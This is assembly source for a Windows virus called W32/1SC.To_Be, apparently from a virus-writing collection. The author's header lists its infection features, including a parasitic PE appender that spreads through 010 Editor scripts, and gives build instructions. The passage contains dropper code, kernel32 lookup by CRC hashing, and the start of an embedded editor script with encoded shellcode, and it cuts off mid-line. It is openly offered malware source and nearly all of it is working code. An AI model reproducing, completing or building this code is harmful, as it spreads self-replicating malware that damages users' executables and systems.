comment ;) W32/1SC.To_Be by roy g biv some of its features: - parasitic direct action infector of PE exe (but not looking at suffix) - infects files when 010 Editor loads them - last section appender - uses CRCs instead of API names - no infect files with data outside of image (eg self-extractors) - uses Windows 7 compatible method to find kernel address not a remake this time - 010 Editor script infects PE files! --- optimisation tip: Windows appends ".dll" automatically, so this works: push "cfs" push esp call LoadLibraryA --- to build this thing: tasm ---- tasm32 /ml /m3 to_be tlink32 /B:400000 /x to_be,,,import32 Virus section is already writable, so no need to alter section attributes --- We're in the middle of a phase transition: a butterfly flapping its wings at just the right moment could cause a storm to happen. -I'm trying to understand- I'm at a moment in my life- I don't know where to flap my wings. (Danny Hillis) (; .486 ;bswap .model flat extern LoadLibraryA:proc extern MessageBoxA:proc extern ExitProcess:proc .data include to_be.inc calcsize equ 0 ;set to 1 to display codesize, then search ";replace" below dropper label near if calcsize xor ebx, ebx push ebx push ebx call skip_body db 6 dup (0) ;up to 99999 bytes skip_body label near pop edi push edi mov eax, codesize cdq mov ecx, 10000 div ecx test al, al je skip_10000 add al, '0' stos byte ptr [edi] skip_10000 label near xchg edx, eax cdq mov cx, 1000 div ecx add al, '0' stos byte ptr [edi] xchg edx, eax cdq mov cx, 100 div ecx add al, '0' stos byte ptr [edi] xchg edx, eax cdq mov cl, 10 div ecx add al, '0' stos byte ptr [edi] xchg edx, eax add al, '0' stos byte ptr [edi] push ebx call MessageBoxA push ebx call ExitProcess endif push ebx mov edx, krncrc_count mov ebx, offset krnnames mov edi, offset krncrcbegin call create_crcs mov edx, regcrc_count mov ebx, offset regnames mov edi, offset regcrcbegin call create_crcs pop ebx push (offset do_message - offset dropper) + 2000h ;----------------------------------------------------------------------------- ;everything before this point is dropper code ;no exception handler this time because I don't care if the .cfg is corrupted ;----------------------------------------------------------------------------- tobe_begin label near push ebx mov eax, dword ptr [ebx + pebLdr] ;ebx = fs:[30h] at start time mov esi, dword ptr [eax + ldrInLoadOrderModuleList] lods dword ptr [esi] xchg esi, eax lods dword ptr [esi] mov ebx, dword ptr [eax + mlDllBase] call parse_exports ;----------------------------------------------------------------------------- ;API CRC table, null terminated ;----------------------------------------------------------------------------- krncrcbegin label near dd (krncrc_count + 1) dup (0) krncrcend label near call load_reg db "advapi32", 0 reg_key db "Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders", 0 personal db "Personal", 0 script1 db "int a=2514" ;replace this with codesize db ",c=FileSize(),d,f,g,h,i,j,k,l;char b[a]=", 22h, "hrgb!\xE8\xFF\xFF\xFF\xFF\xC0^\x83\xC62\x8B\xFE\xADj\x4Y\xC1\xC0\b<0s\x5,C\xC0\xE8\x2\x4\x4IHXS" script2 db 22h, ",e[96];if(c>64){d=ReadInt(60);if(d+96=k&&l